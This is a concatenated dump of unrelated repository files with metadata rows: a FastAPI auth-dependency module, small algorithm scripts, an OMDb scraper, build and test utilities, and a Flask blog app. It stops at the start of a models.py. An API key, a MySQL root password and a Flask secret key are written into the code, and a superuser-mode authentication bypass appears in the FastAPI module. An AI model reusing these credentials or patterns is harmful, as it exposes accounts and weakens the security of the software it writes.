57010b47b950365998b095abc368fa6298c74e4d | 0379bae8cff218a039d79104c38cd1ad2b506919 | /vision/depends.py | bbdf258031515e9ac62cdeb28005634656976f99 | [] | no_license | ottozrq/Louvre | 0128673e05cdabbd1acc5499605a31232b110682 | 170d3421c821694c31b6fee49c99e97fe76f728e | refs/heads/master | 2022-07-14T04:21:42.390515 | 2022-07-03T19:50:38 | 2022-07-03T19:50:38 | 167,688,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,220 | py | import logging
from typing import Optional
from fastapi import Depends, Request, HTTPException, status
from fastapi.security import OAuth2PasswordBearer
from pydantic import PositiveInt
from pydantic.types import constr
import models as m
import sql_models as sm
from utils import flags
from utils.utils import VisionDb, postgres_session, VisionSearch, search_session
class _Bearer(OAuth2PasswordBearer):
    # When a superuser email is configured via flags, short-circuits and
    # returns a falsy value instead of extracting the bearer token
    # (auth is effectively bypassed in superuser/dev mode).
    async def __call__(self, request: Request) -> Optional[str]:
        return not flags.VisionFlags.get().superuser_email and await super(
            _Bearer, self
        ).__call__(request)


# Shared FastAPI security dependency for all protected endpoints.
security = _Bearer("/token/")

logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def get_psql() -> VisionDb:
    """FastAPI dependency: yield a per-request Postgres session."""
    with postgres_session() as psql:
        yield psql


def get_search() -> VisionSearch:
    """FastAPI dependency: yield a per-request search session."""
    with search_session() as search:
        yield search


def get_pagination(
    request: Request,
    page_token: constr(regex=r"\d+") = None,  # noqa
    page_size: PositiveInt = None,
):
    """Build a Pagination model from the optional query parameters."""
    return m.Pagination(request=request, page_size=page_size, page_token=page_token)
def get_user_id(
    request: Request,
    _=Depends(security),
) -> str:
    """Return the authenticated user's UUID as a string."""
    return str(request.user.user_uuid)


def get_user_email(
    request: Request,
    _=Depends(security),
) -> str:
    """Return the authenticated user's email as a string."""
    return str(request.user.user_email)


def get_logged_in_user(
    user_id=Depends(get_user_id),
    db=Depends(get_psql),
) -> sm.User:
    """Load the logged-in user's DB row; 404 if it does not exist."""
    return m.User.db(db).get_or_404(user_id)


def superuser_email() -> str:
    """Return the superuser email from the runtime flags."""
    return flags.VisionFlags.get().superuser_email
def user_owned_series(
    series_id: int,
    user: sm.User = Depends(get_logged_in_user),
    db: VisionDb = Depends(get_psql),
) -> sm.Series:
    """Return the series when the current user owns it.

    Raises 403 when not owned; 404 when owned but missing from the DB.
    """
    if user.own_series(series_id):
        return m.Series.db(db).get_or_404(series_id)
    raise HTTPException(status.HTTP_403_FORBIDDEN, "Cannot access series")
def user_owned_introductions(
    introduction_id: int,
    user: sm.User = Depends(get_logged_in_user),
    db: VisionDb = Depends(get_psql),
) -> sm.Introduction:
    """Return the introduction when the current user may access it.

    Raises 403 when not permitted; 404 when permitted but missing.

    NOTE(review): the permission check calls ``user.own_series`` with an
    introduction id — presumably an introduction-ownership check was
    intended; confirm against the User model. (Return annotation was
    corrected from sm.Series to sm.Introduction to match the value
    actually returned.)
    """
    if user.own_series(introduction_id):
        return m.Introduction.db(db).get_or_404(introduction_id)
    raise HTTPException(status.HTTP_403_FORBIDDEN, "Cannot access series")
| [
"zhang_r@epita.fr"
] | zhang_r@epita.fr |
1e24c62ea195655b0d2b9e5b17a2627f86a53fe8 | 359430379764e4f1936dd24a5328bbbbc0f0e928 | /Code/AlgoPython/3_sum_triplet.py | bdf5a7d5bb4044147ad0529ce0d716621d51d648 | [] | no_license | chenwang07/LeetCode101 | a002878bf0e584cb6a69f6519d3c6e5adace73c1 | 691a36a0d43de9345fe6fa34b01495ae9ce2d0d1 | refs/heads/master | 2023-08-24T09:12:22.558429 | 2021-09-27T05:09:51 | 2021-09-27T05:09:51 | 359,049,371 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,248 | py |
def threeSum(nums):
    """Return index triplets [i, j, k] whose values sum to zero.

    Sorts ``nums`` in place first (indices refer to the sorted order and
    the caller's list is mutated). Unlike the classic 3-sum, duplicates
    are enumerated rather than skipped: when equal values repeat at
    either end, extra index triplets with the same value-sum are emitted.
    Two-pointer scan: for each anchor i, j walks up and k walks down.
    """
    nums.sort()
    ans = []
    i = 0
    while i < len(nums) - 2:
        j = i + 1
        k = len(nums) - 1
        while j < k:
            target = nums[i] + nums[j] + nums[k]
            if target == 0:
                ans.append([i, j, k])
                temp_k = k
                temp_j = j
                # Emit triplets for runs of equal values below k ...
                while nums[temp_k] == nums[temp_k - 1] and j < temp_k - 1:
                    ans.append([i, j, temp_k - 1])
                    temp_k -= 1
                # ... and for runs of equal values above j ...
                while nums[temp_j] == nums[temp_j + 1] and temp_j + 1 < k:
                    ans.append([i, temp_j + 1, k])
                    temp_j += 1
                # ... and for simultaneous equal runs on both sides.
                while nums[j] == nums[j + 1] and nums[k] == nums[k - 1] and j + 1 < k - 1:
                    ans.append([i, j + 1, k - 1])
                    j += 1
                    k -= 1
                j += 1
                k -= 1
            elif target > 0:
                # Sum too large: move the high pointer down.
                k -= 1
            else:
                # Sum too small: move the low pointer up.
                j += 1
        i += 1
    return ans


# Ad-hoc driver: print the result for two duplicate-heavy cases.
test_case = [[-5, 2, 2, 3, 3], [-4, 2, 2, 2, 2]]
for nums in test_case:
    print("test case: " + str(nums))
    ans = threeSum(nums)
    print(" ans: " + str(ans))
| [
"wangchen9617@gmail.com"
] | wangchen9617@gmail.com |
2858f8e42d24497ae53e3eb44307634afd3ca1a9 | 28e1eec958ba44af8f6c24fa30c5876ddbfef3c3 | /Network Project/data_collection_MPI.py | 5a676ff7d890c2df604829333809ab1d9c38c660 | [] | no_license | keertanavc/Hollywood-Network-Analysis | bc2b346539a0231d744611e7724e968e704d9f01 | 68329c09d684aeb63cbfd4c72a63d1ef19101a79 | refs/heads/master | 2023-05-01T14:49:05.517345 | 2021-05-18T18:00:58 | 2021-05-18T18:00:58 | 276,760,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | import pandas as pd
import time
from mpi4py import MPI
import omdb
# Bug fix: ``header=False`` is not a valid pandas argument and raises
# ValueError. keys.csv holds one API key per line with no header row, so
# read it with header=None and take the first column's values.
API_KEYS = list(pd.read_csv('keys.csv', header=None)[0])

# ids.csv has a header row with an 'IDS' column of IMDb ids.
file = "ids.csv"
ids = list(pd.read_csv(file)['IDS'])

# Pre-sized result slots, one per id; filled in by the MPI workers.
data_list = [None] * len(ids)
def get_data():
    """Fetch OMDb records for this MPI rank's slice of ``ids``.

    Each rank takes a contiguous chunk of ``ids`` and fills the matching
    slots of the module-level ``data_list`` (one key per rank).
    """
    # Get rank of process and overall size of communicator:
    comm = MPI.COMM_WORLD
    rank = comm.Get_rank()
    size = comm.Get_size()
    API_KEY = API_KEYS[rank]
    omdb.set_default('apikey', API_KEY)
    # NOTE(review): integer division drops the remainder — when
    # len(ids) % size != 0 the trailing ids are never fetched; confirm.
    interval = int(len(ids)/size)
    start = rank * interval
    end = (rank + 1) * interval
    for i in range(start, end):
        print(i)
        data_list[i] = omdb.imdbid(ids[i], fullplot=True, tomatoes=True)
def main():
    """Entry point: run this rank's share of the data collection."""
    get_data()


if __name__ == '__main__':
    # Time the whole collection run for this process.
    t0 = time.time()
    main()
    print('time is ', time.time()-t0)
"noreply@github.com"
] | noreply@github.com |
e5bdaa5d9ff14cb0d2b34e49fa0389a934836dfa | 8325f238b8d59f9302a945340070809aab3b1901 | /manage.py | 892dfb1b15350aa9575265d56eb0aed1c1d04e87 | [] | no_license | k1-k0/wishl | c2c512499f2f18aa08b5427e4d2ba6435343a8b5 | f04e134b37a26b58d1a5acfdf41bab5d94eb8ae7 | refs/heads/main | 2022-12-26T04:58:00.238984 | 2020-10-10T11:35:46 | 2020-10-10T11:35:46 | 302,756,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks."""
    # Default settings module; a pre-set env var takes precedence.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'wishl.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    # Dispatch the CLI command (runserver, migrate, ...).
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
| [
"kmssrvk@gmail.com"
] | kmssrvk@gmail.com |
feb850b55fd1cc2c30c7f719c3b998baa728d807 | 7466c07a65c9a6356bcb05fafb03d4eed7ba7ffa | /pyradox/csv.py | 9610f2789f466c9db3efbfe57c393f755065b9f1 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | CHBresser/pyradox | 658cdfa0f70b48ccce50e21f76d62a468d5c6100 | c44f6c0b8ce6705722237693ecc02a31c3081cb1 | refs/heads/master | 2021-05-11T07:48:17.540632 | 2017-12-20T08:17:54 | 2017-12-20T08:17:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,915 | py | import csv
import os
import warnings
import pyradox.primitive
import pyradox.struct
import pyradox.table
from pyradox.error import ParseError, ParseWarning
encoding = 'cp1252'
class ParadoxDialect(csv.Dialect):
    """csv dialect for Paradox game data files: semicolon-separated,
    LF-terminated, no quoting."""
    delimiter = ';'
    lineterminator = '\n'
    quoting = csv.QUOTE_NONE  # no quotes AFAICT
    strict = True
def parse_file(filename, verbose=False):
    """Parse a single Paradox-style .csv file into a Table.

    The file handle is now managed by a context manager, so it is closed
    even if reading raises (the original leaked it on error).
    """
    with open(filename, encoding=encoding) as f:
        lines = f.readlines()
    if verbose: print('Parsing file %s.' % filename)
    return parse(lines, filename)
def parse_dir(dirname, verbose=False):
    """Given a directory, iterate over the content of the .csv files in that directory"""
    for filename in os.listdir(dirname):
        fullpath = os.path.join(dirname, filename)
        # Only plain files with a .csv extension are parsed; yields
        # (filename, parsed Table) pairs.
        if os.path.isfile(fullpath):
            _, ext = os.path.splitext(fullpath)
            if ext == ".csv":
                yield filename, parse_file(fullpath, verbose)
def parse(lines, filename):
    """Parse Paradox csv lines into a pyradox Table.

    The first row supplies the (lowercased) headings; every later row is
    padded with '' or truncated so its length matches the headings, with
    a ParseWarning on any mismatch. The trailing token of each row is
    dropped (files end each line with the delimiter).
    """
    reader = csv.reader(lines, dialect = ParadoxDialect)
    heading_tokens = next(reader, None)
    if heading_tokens is None:
        raise ParseError('%s, row 1 (headings): csv file must have at least one row' % filename)
    headings = [x.lower() for x in heading_tokens[:-1]]
    result = pyradox.table.Table(headings)
    # Bug fix: the original reused ``i`` for both the enumerate row counter
    # and the padding loop below, shadowing the row number used in warnings.
    for row_index, row_tokens in enumerate(reader):
        row_tokens = row_tokens[:-1]
        if len(row_tokens) == 0: continue
        if len(row_tokens) != len(headings):
            warnings.warn(ParseWarning('%s, row %d: row length (%d) should be same as headings length (%d)' % (filename, row_index + 2, len(row_tokens), len(headings))))
            # Pad short rows with empty strings.
            for pad_index in range(len(row_tokens), len(headings)):
                row_tokens.append('')
        row_tokens = row_tokens[:len(headings)]
        result.add_row([pyradox.primitive.make_primitive(token, default_token_type = 'str') for token in row_tokens])
    return result
| [
"ajul1987@gmail.com"
] | ajul1987@gmail.com |
1d96da553a7c5a29b6415d5ee4db4fb85660f547 | 6c4bcd1ad86869ee15aab228853060b26ed09e3b | /suite/app.mozbuild | 6f34b52a6ea3bd0ed4f329f6ed81b645ffd6b50e | [] | no_license | mxOBS/deb-pkg_icedove | 18b43958d7bfc3529dc7de505ab6d31a08446be1 | 10b6a968583b8d721bedcffc87851c569e2467a3 | refs/heads/master | 2021-01-20T08:24:26.807514 | 2015-05-14T13:56:12 | 2015-05-14T13:56:12 | 35,611,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,014 | mozbuild | # vim: set filetype=python:
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# Directories linked into libxul for this application (filled in below
# when mailnews is linked internally).
app_libxul_dirs = []
app_libxul_static_dirs = []

include('../bridge/bridge.mozbuild')

# With complete external linkage, mailnews is folded into libxul.
if not CONFIG['MOZ_INCOMPLETE_EXTERNAL_LINKAGE']:
    app_libxul_dirs = mailnews_dirs
    app_libxul_static_dirs = mailnews_static_dirs

if not CONFIG['LIBXUL_SDK']:
    include('/toolkit/toolkit.mozbuild')

# Otherwise mailnews builds as part of the app tier instead.
if CONFIG['MOZ_INCOMPLETE_EXTERNAL_LINKAGE']:
    add_tier_dir('app', mailnews_static_dirs, static=True)
    add_tier_dir('app', mailnews_dirs)

# Optional features, each gated on its configure flag.
if CONFIG['MOZ_EXTENSIONS']:
    add_tier_dir('app', 'extensions')

if CONFIG['MOZ_COMPOSER']:
    add_tier_dir('app', '../editor/ui')

add_tier_dir('app', CONFIG['MOZ_BRANDING_DIRECTORY'])

if CONFIG['MOZ_CALENDAR']:
    add_tier_dir('app', '../calendar/lightning')

add_tier_dir('app', ['../mozilla/xpfe/components/autocomplete', '../suite'])
"privacy@not.given"
] | privacy@not.given |
c87601687dd5c7c65e20dba92b239e070261b317 | 3670f46666214ef5e1ce6765e47b24758f3614a9 | /oneflow/python/test/onnx/util.py | d2222f7d6b30cad257fa79d950b134ab33ead31c | [
"Apache-2.0"
] | permissive | ashing-zhang/oneflow | 0b8bb478ccd6cabea2dca0864defddab231919bf | 70db228a4d361c916f8f8d85e908795b479e5d20 | refs/heads/master | 2022-12-14T21:13:46.752535 | 2020-09-07T03:08:52 | 2020-09-07T03:08:52 | 293,535,931 | 1 | 0 | Apache-2.0 | 2020-09-07T13:28:25 | 2020-09-07T13:28:24 | null | UTF-8 | Python | false | false | 2,994 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import oneflow as flow
import onnxruntime as ort
import onnx
from collections import OrderedDict
import tempfile
import os
import shutil
def convert_to_onnx_and_check(
    job_func,
    print_outlier=False,
    explicit_init=True,
    external_data=False,
    ort_optimize=True,
    opset=None,
):
    """Export a OneFlow job to ONNX and check outputs against onnxruntime.

    Saves the job's weights to a temp dir, exports an ONNX model, runs it
    in onnxruntime on random inputs, and asserts the results are close to
    OneFlow's own output for the same inputs.

    Args:
        job_func: OneFlow global-function to export and compare.
        print_outlier: print elementwise mismatches beyond tolerance.
        explicit_init: create a dummy variable before init (see comment).
        external_data: store ONNX weights as external data files.
        ort_optimize: enable onnxruntime graph optimizations.
        opset: ONNX opset version to export (None = exporter default).
    """
    check_point = flow.train.CheckPoint()
    if explicit_init:
        # it is a trick to keep check_point.save() from hanging when there is no variable
        @flow.global_function(flow.FunctionConfig())
        def add_var():
            return flow.get_variable(
                name="trick",
                shape=(1,),
                dtype=flow.float,
                initializer=flow.random_uniform_initializer(),
            )
    check_point.init()
    flow_weight_dir = tempfile.TemporaryDirectory()
    check_point.save(flow_weight_dir.name)
    # TODO(daquexian): a more elegant way?
    # Busy-wait for the async snapshot to finish writing.
    while not os.path.exists(os.path.join(flow_weight_dir.name, "snapshot_done")):
        pass
    onnx_model_dir = tempfile.TemporaryDirectory()
    onnx_model_path = os.path.join(onnx_model_dir.name, "model.onnx")
    flow.onnx.export(
        job_func,
        flow_weight_dir.name,
        onnx_model_path,
        opset=opset,
        external_data=external_data,
    )
    flow_weight_dir.cleanup()
    ort_sess_opt = ort.SessionOptions()
    ort_sess_opt.graph_optimization_level = (
        ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
        if ort_optimize
        else ort.GraphOptimizationLevel.ORT_DISABLE_ALL
    )
    sess = ort.InferenceSession(onnx_model_path, sess_options=ort_sess_opt)
    onnx_model_dir.cleanup()
    # The comparison below assumes a single output and at most one input.
    assert len(sess.get_outputs()) == 1
    assert len(sess.get_inputs()) <= 1
    ipt_dict = OrderedDict()
    for ipt in sess.get_inputs():
        # Random float32 inputs in [-10, 10) shaped per the ONNX graph.
        ipt_data = np.random.uniform(low=-10, high=10, size=ipt.shape).astype(
            np.float32
        )
        ipt_dict[ipt.name] = ipt_data
    onnx_res = sess.run([], ipt_dict)[0]
    oneflow_res = job_func(*ipt_dict.values()).get().numpy()
    rtol, atol = 1e-2, 1e-5
    if print_outlier:
        a = onnx_res.flatten()
        b = oneflow_res.flatten()
        for i in range(len(a)):
            if np.abs(a[i] - b[i]) > atol + rtol * np.abs(b[i]):
                print("a[{}]={}, b[{}]={}".format(i, a[i], i, b[i]))
    assert np.allclose(onnx_res, oneflow_res, rtol=rtol, atol=atol)
| [
"noreply@github.com"
] | noreply@github.com |
73b8962f54f6fcb301915d94c2bc3359b13a4d6b | 00149437f4bfb490a56cc7faf170a27c2ba16fcf | /.ipynb_checkpoints/api_keys-checkpoint.py | 4afbf07688d989b10cb2225846ce24fb348d8867 | [] | no_license | PabloBarbatto/WeatherPython | d0c20d2161949ab1775f0d6f56710dfa68643f55 | 9a9651cb42774fb6574e1e8223b307e7f6ec3b6f | refs/heads/master | 2020-04-02T07:21:29.138648 | 2018-10-27T18:05:30 | 2018-10-27T18:05:30 | 154,192,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | api_key = "19b32067ed32e919fafe0c91f8bf0faa"
| [
"pablonbarbatto@gmail.com"
] | pablonbarbatto@gmail.com |
95c8d89866be1ab21e245c5c39170e3918f41ece | 78c4ccb183a99ebaabcdc3a3a69f029e4aee0f5c | /AlgorithmStudy/백준/무지성 랜덤풀이/9월/9.27/13549 숨바꼭질3.py | e0e130cd47181bea752f97e6b07942782346f798 | [] | no_license | cladren123/study | ef2c45bc489fa658dbc9360fb0b0de53250500e5 | 241326e618f1f3bb1568d588bf6f53b78920587a | refs/heads/master | 2023-09-02T02:21:24.560967 | 2021-11-05T12:20:06 | 2021-11-05T12:20:06 | 368,753,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,339 | py | """
문제유형 :
그래프 이론
그래프 탐색
너비 우선 탐색
다익스트라
0-1 너비 우선 탐색
시간초과 발생
범위를 지정해서 범위가 초과하는 것들을 걷어내니 해결할 수 있었다.
"""
import sys
from collections import deque
input = sys.stdin.readline
# n : 수빈 k : 동생
n, m = map(int, input().split())
# 최대 크기 변수
maxnum = 100001
# x 지점에 도착했을 때 시간을 담을 리스트
timelist = [-1] * maxnum
# x 지점을 방문했는지 표시하는 리스트
visited = [0] * maxnum
# 초기화 하는 과정도 중요하다. -> 하지 않으면 에러 발생
que = deque()
que.append(n)
timelist[n] = 0
visited[n] = 1
while que :
loc = que.popleft()
# *2 인 경우, 시간을 소요하지 않으므로 먼저 탐색하게 만든다.
if loc*2 < maxnum and visited[loc*2] == 0 :
timelist[loc*2] = timelist[loc]
visited[loc*2] = 1
que.appendleft(loc*2)
# +1 인 경우
if loc+1 < maxnum and visited[loc+1] == 0 :
visited[loc+1] = 1
timelist[loc+1] = timelist[loc] + 1
que.append(loc+1)
# -1 인 경우
if loc-1 >= 0 and visited[loc-1] == 0 :
visited[loc-1] = 1
timelist[loc-1] = timelist[loc] + 1
que.append(loc-1)
print(timelist[m])
| [
"48821942+cladren123@users.noreply.github.com"
] | 48821942+cladren123@users.noreply.github.com |
cfdd9936a4881e9c2aed6cc7dcbb8330ddc68541 | 84c2986c9c9dfa916e5e6021695302c38210718d | /Image Processing in OpenCV/Smoothing Images.py | dfc8e288d5cc6ff25a4f03ba40eec1f285b916ec | [] | no_license | PurpleRabb/Python-OpenCV-Samples | 8fede8630b7777d924ef49c00260eb055165d602 | 942def64caa883a0b3596b1c90efef49cb824bde | refs/heads/master | 2021-07-16T11:45:41.127411 | 2020-11-24T10:17:06 | 2020-11-24T10:17:06 | 226,841,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | import cv2
import numpy as np
from matplotlib import pyplot as plt
# 2D Convolution: convolve the image with an explicit averaging kernel.
img = cv2.imread('../images/opencv-logo2.png')
kernel = np.ones((5, 5), np.float32) / 25
print(kernel)
dst2d = cv2.filter2D(img, -1, kernel)

# Built-in smoothing filters for comparison.
blur = cv2.blur(img, (5, 5))
gauss_blur = cv2.GaussianBlur(img, (5, 5), 0)
median = cv2.medianBlur(img, 5)
bil_blur = cv2.bilateralFilter(img, 9, 75, 75)  # bilateral filter

images = [img, dst2d, blur, gauss_blur, median, bil_blur]
titles = ['Original', 'Averaging', 'blur', 'gauss_blur', 'median_blur', 'bil_blur']

# Bug fix: there are six images but the loop ran range(5), so the
# bilateral-filter result was never plotted.
# NOTE(review): cv2.imread returns BGR while matplotlib expects RGB, so
# colors will appear swapped — convert with cv2.cvtColor if that matters.
for i in range(len(images)):
    plt.subplot(2, 3, i + 1)
    plt.imshow(images[i])
    plt.title(titles[i])
plt.show()
| [
"364725259@qq.com"
] | 364725259@qq.com |
2d9bb0acebd09799be1988fc4a1ab4dba359e456 | a84f3c73126f6f7a81a6944cc1559421160fa7cf | /solved/Silver1/[11052]카드 구매하기.py | 2c740da5df6aae231ffaac614ccb33f5f953b833 | [] | no_license | JiMinwoo/Algorithm | c042ca1a0344de701ef0526a8ac7549edc821009 | 5346cd080b6221688e944165bec84872333628e6 | refs/heads/main | 2023-07-10T07:31:40.730026 | 2021-08-13T14:44:34 | 2021-08-13T14:44:34 | 372,530,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | N = int(input())
pack = [0]
pack += list(map(int,input().split()))
dp = [0] * (N+1)
dp[1] = pack[1]
dp[2] = max(pack[2], pack[1]*2)
for i in range(3, N+1):
for j in range(1, i//2 + 1): #j와 i-j로 만드는 경우
dp[i] = max(pack[i], dp[j] + dp[i-j])
print(dp[N]) | [
"jmw492@naver.com"
] | jmw492@naver.com |
2a6a40cc88e837f0735dc0d70e5787830ec168fd | c337ba37b6442e0baef21f942fae7dcdf3ab1515 | /app.py | 09ded8ae294f7e15dce6d32ba90eed36b3cc26a6 | [] | no_license | mwuillai/blog | 39c2c4456d97b93089970203c048021ebc74f7a6 | e37b1638b8e584b44fb34243418a19bee8dcc2c1 | refs/heads/master | 2020-03-19T16:35:04.640834 | 2018-08-16T08:02:12 | 2018-08-16T08:02:12 | 136,720,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,660 | py | from flask import Flask, render_template, flash, request, redirect, url_for, session, logging
from flask_mysqldb import MySQL
from wtforms import Form, StringField, TextAreaField, PasswordField, validators
from passlib.hash import sha256_crypt
from functools import wraps
app = Flask(__name__)
# config Mysql
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'aqwZSX'
app.config['MYSQL_DB'] = 'flaskblog'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
# init MYSQL
mysql = MySQL(app)
def page_data(title):
    """Fetch the `pages` row with the given title (None when absent).

    Security fix: the original interpolated ``title`` straight into the
    SQL string (injection risk, breaks on quotes); use a parameterized
    query instead. The cursor is also closed before returning.
    """
    cur = mysql.connection.cursor()
    cur.execute("SELECT * FROM pages WHERE title = %s", (title,))
    page = cur.fetchone()
    cur.close()
    return page
@app.route('/')
def index():
    """Home page, rendered from the 'Hello world' page record."""
    page = page_data("Hello world")
    return render_template('home.html', page=page)


@app.route('/about')
def about():
    """About page (French title: 'à propos')."""
    page = page_data("à propos")
    return render_template('about.html', page=page)
@app.route('/articles')
def articles():
    """List all articles."""
    cur = mysql.connection.cursor()
    cur.execute("SELECT * FROM articles")
    articles = cur.fetchall()
    # Bug fix: the original placed cur.close() after the return statement,
    # so it never executed and the cursor leaked.
    cur.close()
    page = page_data("Articles")
    return render_template('articles.html', articles=articles, page=page)


@app.route('/article/<string:id>/')
def article(id):
    """Show a single article by its id."""
    cur = mysql.connection.cursor()
    # Bug fix: query parameters must be a sequence — passing the bare
    # string made the driver iterate its characters and fail for
    # multi-digit ids. The cursor is also closed before returning now.
    cur.execute("SELECT * FROM articles WHERE id = %s", (id,))
    article = cur.fetchone()
    cur.close()
    return render_template('article.html', article=article)
class registerform(Form):
    """WTForms registration form; password must match its confirmation."""
    name = StringField('name', [validators.length(min=1, max=50)])
    username = StringField('username', [validators.length(min=4, max=25)])
    email = StringField('email', [validators.length(min=6, max=50)])
    password = PasswordField('password', [validators.DataRequired(
    ), validators.EqualTo('confirm', message='passwords do not match')])
    confirm = PasswordField('confirm password')


class ArticleForm(Form):
    """WTForms form for creating a new article."""
    title = StringField('title', [validators.length(min=1, max=255)])
    body = TextAreaField('body')
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Create a user account, then redirect to the login page."""
    form = registerform(request.form)
    if request.method == 'POST' and form.validate():
        name = form.name.data
        email = form.email.data
        username = form.username.data
        # NOTE(review): passlib's .encrypt() is a deprecated alias of .hash().
        password = sha256_crypt.encrypt(str(form.password.data))

        # create cursor
        cur = mysql.connection.cursor()
        cur.execute("INSERT INTO users(name, email, username, password) VALUES(%s, %s, %s, %s)", (
            name, email, username, password))

        # Commit to DB
        mysql.connection.commit()
        cur.close()

        flash('you are now registered and can log in', 'success')
        # Bug fix: redirect() accepts no `page` keyword — the original
        # raised TypeError on every successful registration.
        return redirect(url_for('login'))
    page = page_data("Inscription")
    return render_template('register.html', form=form, page=page)
# Check if user logged in
def is_logged_in(f):
    """Decorator: run the view only when the session is logged in,
    otherwise flash a warning and redirect to the login page."""
    @wraps(f)
    def wrap(*args, **kwargs):
        if 'logged_in' in session:
            return f(*args, **kwargs)
        else:
            flash('Unauthorized, Please login', 'danger')
            # Bug fix: redirect() accepts no `page` keyword — the original
            # raised TypeError whenever an anonymous user hit a protected view.
            return redirect(url_for('login'))
    return wrap
@app.route('/add_article', methods=['GET', 'POST'])
@is_logged_in
def add_article():
    """Create an article (login required), then go to the dashboard."""
    form = ArticleForm(request.form)
    if request.method == 'POST' and form.validate():
        title = form.title.data
        body = form.body.data

        # create cursor
        cur = mysql.connection.cursor()
        cur.execute("INSERT INTO articles(title, body) VALUES(%s, %s)", (
            title, body))

        # Commit to DB
        mysql.connection.commit()
        cur.close()

        flash('Article add successfully', 'success')
        # Bug fix: redirect() accepts no `page` keyword — the original
        # raised TypeError after every successful submission.
        return redirect(url_for('dashboard'))
    page = page_data("ajout d'article")
    return render_template('add_article.html', form=form, page=page)
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Authenticate a user against the users table and open a session."""
    if request.method == 'POST':
        # Get form fields
        username = request.form['username']
        password_candidate = request.form['password']

        # Create cursor
        cur = mysql.connection.cursor()

        # Get user by username
        result = cur.execute(
            "SELECT * FROM users WHERE username = %s", [username])

        if result > 0:
            data = cur.fetchone()
            password = data['password']

            # Compare Passwords
            if sha256_crypt.verify(password_candidate, password):
                # Passed
                session['logged_in'] = True
                session['username'] = username

                flash('You are now logged in', 'success')
                app.logger.info('PASSWORD MATCHED')
                return redirect(url_for('dashboard'))
            else:
                error = 'Invalid login'
                app.logger.info('PASSWORD NOT MATCHED')
                return render_template('login.html', error=error)
            # NOTE(review): both branches above return, so this close is
            # unreachable and the cursor leaks.
            cur.close()
        else:
            error = 'Username not found'
            return render_template('login.html', error=error)

    return render_template('login.html')
@app.route('/dashboard')
@is_logged_in
def dashboard():
    """User dashboard (login required)."""
    page = page_data("Tableau de bord")
    return render_template('dashboard.html', page=page)
# Logout
@app.route('/logout')
def logout():
    """Clear the session and show the login page.

    NOTE(review): renders login.html directly instead of redirecting,
    and the flash has no category — confirm both are intended.
    """
    session.clear()
    flash('You are now logged out')
    return render_template('login.html')
if __name__ == '__main__':
    # SECURITY: hard-coded session secret and debug=True are fine for local
    # development only — never deploy with either.
    app.secret_key = "secret123"
    app.run(debug=True)
| [
"wuillaimathieu78@gmail.com"
] | wuillaimathieu78@gmail.com |
912e9905ac623ea7e54e73e59c0737fe8a99f927 | f26c31f7bddf6afbe4c621f5fdb73f95802411ab | /git_connect_server/git_connect_server/asgi.py | 96da2f7c9e1706832d61af71a20aa472b28fc292 | [] | no_license | Harsh-pandya/gitConnetDjangoVerison | 23e7343a644e6fb4c1aa35299aa98be6e3ca8d07 | ab89844174c70ccae0db9e2ed83681b82b0c4731 | refs/heads/main | 2023-03-10T02:40:27.464265 | 2021-03-02T15:06:41 | 2021-03-02T15:06:41 | 342,909,330 | 0 | 1 | null | 2021-03-01T16:40:12 | 2021-02-27T16:57:21 | HTML | UTF-8 | Python | false | false | 413 | py | """
ASGI config for git_connect_server project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Default settings module; a pre-set env var takes precedence.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'git_connect_server.settings')

# Module-level ASGI callable the server imports and serves.
application = get_asgi_application()
| [
"harshpandya735@gmial.com"
] | harshpandya735@gmial.com |
e22400dd5ebe027e942bdb5aa62837fbadb37131 | d80c8ab73282091e863cd0beef723edd4c91c98d | /models.py | d1a7a128f498863cfac4635c336bc4235d13f8c3 | [] | no_license | DiegoIturra/Web-Scraper | a1f5e04bf71cd4490f51146181d3dfa0159f5f5e | ff6b6cbd4c7585fdc147c9ab9c3f3a61099468c3 | refs/heads/master | 2023-07-02T04:17:43.416018 | 2021-08-15T23:28:09 | 2021-08-15T23:28:09 | 391,232,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | from extensions import db,marshmallow
class Book(db.Model):
